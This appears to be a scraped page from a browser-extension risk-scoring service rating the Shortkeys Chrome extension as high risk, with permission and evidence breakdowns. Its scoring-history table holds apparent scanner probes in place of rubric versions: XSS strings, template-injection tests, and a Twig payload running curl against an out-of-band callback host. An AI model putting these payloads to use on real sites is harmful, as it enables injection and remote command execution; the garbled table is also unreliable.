Shortkeys (Custom Keyboard Shortcuts)
logpjaacgmcbpdkdchjiaagddngobkck
Risk Score
7.44
Risk Level:
High
Recommendation:
🚫 BLOCK
Top Risks
- MANAGEMENT PERMISSION: extension can enumerate and disable other installed extensions (incl. security and privacy tools).
- debugger + scripting + <all_urls> + userScripts = near-total browser control from a gmail-dev extension
- new Function() executes arbitrary user-supplied code strings in background service worker
- browsingData + management permissions allow destructive actions against browser state and other extensions
- Privacy policy is Google's own generic account policy — does not scope to this extension at all (scored +10.0)
Evidence
- HIGH permissions cluster manifest debugger, management, scripting, browsingData, userScripts all declared alongside <all_urls> host permission.
- function_constructor in background.js crx new Function(userCode)() executed in background — arbitrary code execution from stored shortkey scripts.
- Generic Google privacy policy store Privacy URL points to myaccount.google.com — not scoped to this extension; data_collection=true, third_party_sharing=true.
- Free-webmail developer store Developer email mikecrittenden@gmail.com; no verified publisher badge; brand_mention.developer_domain=gmail.com.
- install_url_hijack crx onInstalled opens https://shortkeys.app/welcome (+2.0 Webstore).
- Geo-diverse JS hosts crx 5 countries (CA,DE,IN,SG,US) across 7 external hosts; geo_diversity +1.5 Network.
- is_featured_by_google=true store Featured badge applied; reduces Reputation by -2.0 but does not negate high-capability concern.
- rating 3.4 with no review red-flags store Below 4.5 threshold; no review_red_flags matched; no further penalty applied.
Permissions Breakdown
- downloads medium Can trigger file downloads to user's system.
- storage low Stores extension settings locally.
- tabs medium Can read tab URLs and metadata across all tabs.
- clipboardWrite medium Can write arbitrary content to clipboard.
- browsingData high Can delete browsing history, cookies, cache — destructive high-risk API.
- bookmarks medium Can read/write/delete user bookmarks.
- sessions medium Can access recently closed tabs and session data.
- management high Can disable/uninstall other extensions — significant lateral capability.
- debugger high Attaches Chrome debugger protocol; full page inspection and script injection.
- scripting high Injects scripts into pages; combined with <all_urls> is critical surface.
- notifications low Can display desktop notifications.
- activeTab low Scoped to user-activated tab; lower risk than broad host perms.
- userScripts high Allows execution of arbitrary user-supplied scripts via API — very high risk.
- *://*/* high Broad host permission covering all sites; amplifies every other HIGH permission.
Pillar Scores
Permissions9.50
Reputation6.50
Network4.50
Webstore4.00
Maintenance0.00
Privacy10.00
Code Quality5.00
CVE Exposure0.00
Scoring History
| <fsssiedxa'sssiedx | 7.04 | High | block | 2026-08-16 |
| <fsssiedxa"sssiedx | 7.05 | High | block | 2026-08-16 |
| <fsssiedxa$"sssiedx | 7.21 | High | block | 2026-08-16 |
| "fsssiedxa$"sssiedx | 7.17 | High | block | 2026-08-16 |
| 'fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 7.09 | High | block | 2026-08-16 |
| "fsssiedxa'sssiedx | 7.37 | High | block | 2026-08-16 |
| "fsssiedxa$'sssiedx | 7.31 | High | block | 2026-08-16 |
| fsssiedxa$"sssiedx | 7.27 | High | block | 2026-08-16 |
| 'fsssiedxgfdsaxax><!--></ScRiPt>asddsssiedx | 7.04 | High | block | 2026-08-07 |
| 'fsssiedxg$"sssiedx | 7.01 | High | block | 2026-08-07 |
| $"fsssiedxg sssiedx | 7.19 | High | block | 2026-08-07 |
| <fsssiedxf$"sssiedx | 7.27 | High | block | 2026-08-07 |
| <fsssiedxa'sssiedx | 7.30 | High | block | 2026-08-07 |
| <fsssiedxi sssiedx | 6.97 | High | block | 2026-08-07 |
| fsssiedx<sssiedx | 7.24 | High | block | 2026-08-07 |
| xx pfsssiedxasssiedx | 7.08 | High | block | 2026-08-05 |
| %22fsssiedxa xx psssiedx | 7.41 | High | block | 2026-08-05 |
| 'fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 7.22 | High | block | 2026-08-05 |
| %27fsssiedxa$'sssiedx | 7.17 | High | block | 2026-08-05 |
| 7.14 | High | block | 2026-08-05 | |
| "fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 7.45 | High | block | 2026-08-05 |
| <fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 7.32 | High | block | 2026-08-05 |
| fsssiedxa<sssiedx | 7.14 | High | block | 2026-08-05 |
| dfb__${98991*97996}__::.x | 7.11 | High | block | 2026-08-05 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 7.02 | High | block | 2026-08-05 |
| v3.6&n916501=v989272 | 6.88 | High | block | 2026-08-05 |
| <fsssiedx{ sssiedx | 6.64 | High | block | 2026-07-29 |
| <fsssiedx{$'sssiedx | 7.01 | High | block | 2026-07-29 |
| <fsssiedxh xx psssiedx | 7.14 | High | block | 2026-07-29 |
| <fsssiedxh$"sssiedx | 7.07 | High | block | 2026-07-29 |
| fsssiedxh"sssiedx | 7.21 | High | block | 2026-07-29 |
| sssieddrubricxsx | 6.51 | High | block | 2026-07-29 |
| %76%33%2E%36%39%37%35%38%22%28%29%3B%7D%5D%39%33%33%32 | 7.07 | High | block | 2026-07-29 |
| v3.6"sTYLe='zzz:Expre/**/SSion(fksF(9514))'bad=" | 7.20 | High | block | 2026-07-29 |
| v3.6"onmouseover=fksF(95972)" | 7.05 | High | block | 2026-07-29 |
| <%={{={@{#{${dfb}}%> | 7.13 | High | block | 2026-07-29 |
| bfg1640<s1﹥s2ʺs3ʹhjl1640 | 7.14 | High | block | 2026-07-29 |
| <th:t="${dfb}#foreach | 7.41 | High | block | 2026-07-29 |
| bfgx1589%C0%BEz1%C0%BCz2a%90bcxhjl1589 | 7.27 | High | block | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbwdydyznxk73781.bxss.me")}} | 7.07 | High | block | 2026-07-29 |
| v3.6'"()&%<zzz><ScRiPt >fksF(9625)</ScRiPt> | 7.31 | High | block | 2026-07-29 |
| v3.6 | 7.44 | High | block | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:53
Listing SHA
050a0e728c69…
Force block
— not fired
Score recovered
no
Elapsed
27.6s